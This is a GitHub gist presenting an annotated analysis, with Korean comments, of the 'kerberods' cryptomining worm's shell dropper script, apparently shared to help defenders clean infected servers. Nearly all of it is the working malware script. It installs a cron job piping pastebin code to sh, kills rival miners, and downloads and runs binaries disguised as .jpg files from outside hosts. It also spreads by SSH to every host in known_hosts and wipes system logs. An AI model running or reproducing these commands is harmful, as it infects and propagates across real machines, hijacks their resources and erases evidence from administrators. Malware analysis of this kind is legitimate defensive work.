Last active
April 16, 2019 14:29
-
-
Save myso-kr/1b3e658f7acdd3a768077ede77dcef6b to your computer and use it in GitHub Desktop.
"kerberods" malware analysis
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### 해결사례 (변종이 아닌 경우 적용 가능한 것으로 파악 됨) | |
## https://laucyun.com/17e194c26e4554cab975aae760bad553.html | |
## https://git.laucyun.com/.../blob/master/clear_kerberods.sh | |
# 사용되는 코드 | |
1: http://pastebin.com/raw/wR3ETdbi # 유동가능성 존재 | |
2: https://pastebin.com/raw/Zk7Jv9j2 | |
3: https://pastebin.com/raw/0Sxacvsh > GOTO 2 | |
# tmp 생성 및 777 권한 | |
mkdir -p /tmp | |
chmod 1777 /tmp | |
# cron 재등록 | |
echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh" | crontab - | |
# 프로세스 종료 구간 | |
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 | |
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "plfsbce"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "luyybce"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9 | |
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9 | |
netstat -anp|grep 119.9.106.27|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9 | |
netstat -anp|grep 104.130.210.206|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9 | |
# writeable 강제 삭제 | |
cd /tmp | |
touch /usr/local/bin/writeable && cd /usr/local/bin/ | |
touch /usr/libexec/writeable && cd /usr/libexec/ | |
touch /usr/bin/writeable && cd /usr/bin/ | |
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable | |
# 바이너리 다운로드 및 실행 | |
# https://ko.wikipedia.org/wiki/ELF_%ED%8C%8C%EC%9D%BC_%ED%98%95%EC%8B%9D | |
export PATH=$PATH:$(pwd) | |
if [ ! -f "/tmp/.XIMunix" ] || [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then | |
chattr -i kerberods | |
rm -rf kerberods | |
ARCH=$(uname -m) | |
# 복호화툴로 의심되는 항목 (ELF 헤더) | |
# - http://1.z9ls.com/t6/701/1555396475x2918527158.jpg | |
# 각 아키텍쳐별 바이너리 (kerberods로 저장) ################## 핵심 부분 | |
# x86_64x | |
# - https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg | |
# i686x | |
# - https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg | |
if [ ${ARCH}x = "x86_64x" ]; then | |
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -O kerberods) && chmod +x kerberods | |
elif [ ${ARCH}x = "i686x" ]; then | |
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods | |
else | |
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods | |
fi | |
# 실행 가능한 모든 경로로 실행 | |
$(pwd)/kerberods || /usr/bin/kerberods || /usr/libexec/kerberods || /usr/local/bin/kerberods || kerberods || ./kerberods || /tmp/kerberods | |
fi | |
# 알려진 ssh 키 기준으로 모든 터미널 원격 서버측으로 강제 명령 수행 | |
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then | |
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh >/dev/null 2>&1 &' & done | |
fi | |
# 로그 삭제 부분 | |
echo 0>/var/spool/mail/root | |
echo 0>/var/log/wtmp | |
echo 0>/var/log/secure | |
echo 0>/var/log/cron |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment